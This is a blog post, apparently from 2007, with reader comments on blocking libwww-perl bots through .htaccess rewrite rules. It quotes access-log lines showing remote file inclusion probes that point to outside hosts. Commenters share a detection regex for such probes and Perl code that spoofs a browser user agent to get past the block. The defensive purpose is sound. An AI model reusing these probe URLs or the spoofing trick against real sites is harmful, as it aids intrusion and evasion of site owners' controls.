If you look through your server logs you’ll probably notice more than a few requests like these:
GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? … "libwww-perl/5.805"
GET /2004/02/18/smoking-ban-is-on-the-way/trackback/ … "libwww-perl/5.805"
GET /2004/02/18/irish-car-tax-list/trackback/ … "libwww-perl/5.805"
GET /tag/php//tags.php?BBCodeFile=http://drpepper.gigacities.net/id.txt? … "libwww-perl/5.579"
If you do find them (grep libwww-perl access_log) then add the following code to your .htaccess file. On a WordPress site this file should already be there if you’re using fancy permalinks.
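RewriteEngine On
RewriteBase /
# Match any request whose User-Agent contains "libwww-perl"
RewriteCond %{HTTP_USER_AGENT} libwww-perl
# Answer with 403 Forbidden and stop processing further rules
RewriteRule .* - [F,L]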
Change “RewriteBase /” to suit your own base directory.
There are other bad guys out there. This page has a long list of rewrite rules to keep out all sorts of bots! I haven’t looked through them myself so YMMV if you try them.
This has the added benefit of reducing load on your server. WordPress sites are dynamically generated. This is great under normal circumstances but when you get a flood of requests it can place an unnecessary load on your site. WP-Cache helps a lot but these rules will stop them dead at the front door!
PS. ‘Course, if you depend on a libwww-perl application then don’t add this rule or you may give yourself a headache trying to figure out why things stopped working!
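If you do rely on such a script, one possible workaround is to exempt the machine it runs on. A minimal sketch, assuming the script always connects from one fixed address (192.0.2.10 below is a placeholder documentation address, not a real client of this site):

```apache
RewriteEngine On
RewriteBase /
# Assumption: 192.0.2.10 stands in for the address your own script connects from
RewriteCond %{REMOTE_ADDR} !^192\.0\.2\.10$
# Conditions are ANDed by default, so both must hold for the rule to fire
RewriteCond %{HTTP_USER_AGENT} libwww-perl
RewriteRule .* - [F,L]
```

Requests from any other address that carry the libwww-perl user agent still get the 403.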

40 Comments
Robert (16 comments.) on October 10, 2007 at 10:31 am.
Great tip, thanks Donncha.
I had a similar post before because I was getting lots of trackback attempts from WordPress 2.1 alpha and TrackBack/1.0.2. My htaccess is here:
http://www.sweetnam.eu/blog/index.php?/archives/110-Using-.htaccess-to-block-useragents.html
Donncha (1707 comments.) on October 10, 2007 at 10:40 am.
Wow, blocking WordPress is a bit drastic, but I can understand why you did it. It might be better to block by IP or IP range rather than UA in that case?
Robert (16 comments.) on October 10, 2007 at 10:51 am.
It was a drastic decision that I had to put in place because there were literally hundreds of them per hour, all from 2.1 alpha. It lasted about 1 week and then suddenly stopped, so I removed the WordPress entry.
Since the 15th of Sept there have been 7031 attempts to spam my old blog.
3209 – No useragent
1749 – TrackBack/1.02
1338 – Opera/9.0
The rest are b2evolution, IE6.0 etc.
Baris Unver (4 comments.) on October 10, 2007 at 10:56 am.
The page you linked includes code banning IP addresses from Turkey. That’s offensive man, not all of us are bad – but yes, I admit that we got the most idiotic hacker wannabes and those who use internet to curse, fart and try to get laid. Does that mean all of us must be kept out of websites?
David Precious (18 comments.) on October 10, 2007 at 11:06 am.
I’d say banning libwww-perl user agents is a bit drastic too – there’s plenty of decent LWP-based scripts doing useful things.
Granted, they can easily change the user-agent to something more descriptive of what they are and leave out the libwww-perl – but so can any attacker.
I’m surprised that anyone writing attack tools using LWP doesn’t just mimic a common user-agent like IE or Firefox rather than leaving it on the default!
Donncha (1707 comments.) on October 10, 2007 at 11:07 am.
Baris – that’s why I said, “I haven’t looked through them myself so YMMV if you try them.” As you can see yourself since you left a comment here, I haven’t adopted his rules. Thank you for the warning!
Robert – woah, nasty stuff. Glad to see you’re using Akismet now!
Donncha (1707 comments.) on October 10, 2007 at 11:10 am.
David – I know! I couldn’t believe it when I spotted them ages ago, but they’re still at it well over a year after I first noticed them.
TBH – if someone is using a script to interrogate my site I’d hope they have the courtesy to tell me about it first. So far no one has, so I don’t worry about blocking them.
Seeing a 403 on those requests is *so* satisfying too!
Robert (34 comments.) on October 10, 2007 at 11:13 am.
It’s up to 7044 now:
http://www.sweetnam.eu/blogspam/
Aaron (2 comments.) on October 10, 2007 at 2:34 pm.
I use the redirection plugin, and to block this sort of stuff I just use a REGEX and redirect them all through an ALEXA redirect to my home page.
Most of them won’t follow the redirect, but it does block them.
.*php\?(page|j|o|r|file|sub|.*?)=(http|ftp).*
walter (4 comments.) on October 10, 2007 at 2:48 pm.
I echo david’s comment. Not all libwww-perl requests are malicious. Could you at least change the title of your post so it doesn’t paint us genuine perl programmers in such a bad light ? Perl has enough of an image problem already without this.
Donncha (1707 comments.) on October 10, 2007 at 2:54 pm.
Walter – changed “bad guys” to “bots” in the title, but the URL can’t change. Sorry if I upset you, I definitely don’t want to make out all Perl coders are bad!
Baris Unver (4 comments.) on October 10, 2007 at 3:20 pm.
Aaron, I use Redirection, too. Can you explain how we add the regex code?
A.J. (2 comments.) on October 10, 2007 at 6:32 pm.
I have to admit that I’m a bit disappointed in this post as a whole. To suggest blocking libwww-perl completely is sort of like saying we should close down all roads because wrecks frequently happen on them.
That said, if the idea is to reduce spam to one’s blog, wouldn’t it be wise to at least set up some exclusions and block libwww-perl for your comments and postback forms only? To block it out in total is to prevent some news readers/aggregators from getting to your xml/atom/rss feeds.
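A rough sketch of that kind of exclusion, assuming WordPress-style pretty permalinks where feed URLs contain /feed/ (an assumption about the site layout, so adjust the pattern to your own URLs):

```apache
RewriteEngine On
RewriteBase /
# Assumption: feeds live at paths such as /feed/ or /some-post/feed/
RewriteCond %{REQUEST_URI} !/feed(/|$)
RewriteCond %{HTTP_USER_AGENT} libwww-perl
RewriteRule .* - [F,L]
```

Feeds requested through a query string (for example ?feed=rss2) would not be covered by this pattern and would still be blocked.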
Dankoozy (41 comments.) on October 10, 2007 at 6:36 pm.
What do the libwww-perl guys usually do? spamming?
I think i’m going to ban those Opera/9.0 fuckers too. I don’t think there is one legit opera 9.0 user left on the internet and if there is one they can upgrade to 9.2 or change their UA.
I have no rewrite engine installed, but there’s another, easier way to ban them.
http://httpd.apache.org/docs/2.0/mod/mod_access.html#deny
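For anyone who wants to try that route, here is a minimal sketch in the Apache 2.0-era syntax that the linked page documents. It assumes mod_setenvif is loaded and that the server lets .htaccess files set these directives; bad_bot is an arbitrary variable name made up for this example:

```apache
# Flag any request whose User-Agent contains "libwww-perl" (case-insensitive)
SetEnvIfNoCase User-Agent "libwww-perl" bad_bot
# Allow everyone first, then deny the flagged requests
Order Allow,Deny
Allow from all
Deny from env=bad_bot
```

Newer Apache releases replace Order/Allow/Deny with the Require directive, so check which version you are running first.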
Bob! (1 comments.) on October 10, 2007 at 6:45 pm.
Thanks for the advice and the link Donncha. I have added the whole list from that page, although I’ve been through it and commented out the Turkey IPs as that seemed a bit extreme.
I can always uncomment any of them if I ever get any hassle from them in the future.
Donncha (1707 comments.) on October 10, 2007 at 6:49 pm.
AJ – the libwww scripts I see hitting my site hit all sorts of urls, not just comment and trackback urls. Even non-existent urls, looking for an exploit.
I think a huge majority of them are not trying to spam, they’re trying to break into my site. I’m not worried that they’ll succeed because I try to keep up to date but it’s a useful way of stopping them before they hit any php code.
Dan – exploits, almost all exploits as I said above.
I actually added a check for Opera 9 to my comment form but I dump all the comments stopped in a file. Check it out here: http://ocaoimh.ie/spam.txt (for the time being, will be removed!)
Aaron (2 comments.) on October 10, 2007 at 7:53 pm.
Go to the Redirection control Panel.
Scroll to the bottom where it says “Add Redirection”:
Add your regex as the source URL, e.g.: (.*php\?(page|j|o|r|file|sub|.*?)=(http|ftp).*)
Add the file you want to redirect to in the “Target URL”
Select the checkbox that says “Regex”
Click add Regex.
You can also use REGEX when deleting post categories:
Source URL: “/my/original/category/(.*)”
Target URL: “/some/othercategory/$1”
Baris Unver (4 comments.) on October 10, 2007 at 8:00 pm.
Thanks a lot.
By the way, I gotta learn that Regex thing, it seems to work for loads of stuff.
RobertWms (1 comments.) on October 10, 2007 at 10:07 pm.
Isn’t this the sort of thing that Bad Behavior blocks?
Nick Georgakis (1 comments.) on October 11, 2007 at 1:08 am.
Hello Doncha,
My blog was seriously messed up by a libwww bot last week so I have also implemented similar .htaccess rules.
Two of my favorite 403 – Forbidden alternatives are:
402 – Payment required
and a 301 – Permanent Redirect to their own hostname / remote IP with their maliciously crafted exploit URL untouched!
I am currently testing a few additional regexps to block more malicious bots by detecting remote inclusion attempt strings/patterns in the requested URLs but it needs more testing before publishing it.
Platinax (1 comments.) on October 11, 2007 at 3:08 pm.
It’s certainly interesting to see WordPress used as a user-agent. Is that simply an attempt to cover tracks, or simply the sloppy way some spambots are configured?
A.J. (2 comments.) on October 11, 2007 at 3:10 pm.
Donncha,
Perhaps in your case that works. I’ve not been hit so terribly by libwww-perl on my site. But being a PHP and Perl programmer myself, I regularly write apps for people who are looking to incorporate blog RSS/XML/ATOM feeds into their headlines or sites. Of course of late I’m doing most of that work in PHP, but I’m still doing some sites that prefer to crawl feeds in perl and database them. For my clients, I always set the agent name and it refers back to their site so a webmaster could easily tell that they had been crawled by that particular site, but my point remains that libwww-perl is frequently used to retrieve XML/RSS/ATOM feeds. If you exclude it across the board, you are stopping out some sites from reading your feed.
Pingback: BlogSecurity » keeping the bots out
valent on October 14, 2007 at 9:00 pm.
Thanks a lot, I was totally lost before. I hate wwwlib-perl.
Jason Litka (5 comments.) on October 14, 2007 at 11:04 pm.
I’ve been noticing these on my site for some time now. Not knowing what they were, but seeing that they were causing a lot of 404s by hitting non-existent URLs, I 403 banned them with a plugin quite some time ago.
cuervo (1 comments.) on October 15, 2007 at 5:58 am.
Harsh. Too harsh. I’m a Perl programmer, and I use LWP::UserAgent all the time. I tend not to touch the $ua->agent, or I append contact info or a URL to it, so people know what I’m doing.
In particular, I wrote a Jabber bot that periodically goes out and fetches RSS feeds (via LWP::UserAgent), then retransmits those feeds over Jabber to its subscribers.
Seems to me you’re curing the symptoms — it’ll probably cure the disease, but you might kill a few patients along the way.
@Platinax: The WordPress user agent is actually used for trackbacks and whatnot, IIRC.
Pingback: Antonio Trigiani w3bL0g - Informatica Virale » Blog Archive » Evitare attacchi libwww-perl user agent bot sul proprio blog.
Pingback: TechTraction » Blog Archive » TechTraction’s Friday Finds for 10/19/07: Stop the Perl Bots
engtech (1 comments.) on October 20, 2007 at 11:05 pm.
I’m going to have to get in the habit of identifying my user agent properly when I build my perl scripts.
Pingback: Donncha’s Thursday Links at Holy Shmoly!
olly on January 29, 2008 at 3:52 pm.
Hi,
Great post and very useful.
Will blocking libwww-perl have any impact on general users using IE or Firefox who visit a web site? Also, what impact does blocking libwww-perl have on search bots (Google, Yahoo), or does it only affect people trying to launch attacks with libwww-perl?
Mike on April 15, 2008 at 5:38 am.
Why is everyone getting defensive about being a perl programmer? EVERYTHING that hits your site with the user agent “libwww” is CRAP.. that is the bottom line.. Oh, and blocking all of Turkey sounds good too
Holly (1 comments.) on April 25, 2008 at 5:09 pm.
Any suggested links for the Regex thing?
Dark (1 comments.) on April 26, 2008 at 12:18 am.
@olly No, it won’t. As for the bots, their user agents look very much like a regular user’s, except that they add a token such as GoogleBot-2.0 (for example) inside the () where it says MSIE-6 compatible; win32 and stuff like that…
that’s my .20
patricia (1 comments.) on May 13, 2008 at 7:24 pm.
hi, I’m a noob, could you explain to me what this is?:
“RewriteBase /”
thanks
anonymous (1 comments.) on June 27, 2008 at 3:26 pm.
Yeah great!!!
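use LWP::UserAgent;
my $url = 'http://example.com/';  # placeholder target, not from the original comment
my $ua = LWP::UserAgent->new;
# Replace the default "libwww-perl/x.y" agent string with a browser-like one
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008043010 Fedora/3.0-0.60.beta5.fc9 Firefox/3.0b5");
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
if ($res->is_success) {
    # request succeeded
} else {
    # request failed
}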
“I hate wwwlib-perl.”
And Firefox?
Stephen Frazier (1 comments.) on July 5, 2008 at 1:45 pm.
All the tips and comments are great, but obviously directed to or between PROGRAMMERS who understand all the shortcuts and abbreviations so foreign to the regular schmuck like me.
All the other ways to block spam are just not helpful to those of us who just want to put up a site and then go do other stuff. Like WORK.
I don’t mind doing a little pseudo-programming, but at least someone could tell us where to find these mystery files.
I’m still trying to find this MOD_REWRITE file.
Pingback: Me Blog! | Keeping the spambots and crawlers at bay
Steve1974 on March 23, 2009 at 4:54 am.
ok, this may sound daft but just use robots.txt file to control them. THEN the ones that ignore the robots.txt file can be blocked … read the following article
http://www.pixel2life.com/publish/tutorials/472/log_and_block_bad_bots_that_disregard_robots_txt/
I have used a similar method for a long time and have blocked ALL bad bots. It updates itself.
Pingback: Default .htaccess file for all sites | jonathan stegall: creative tension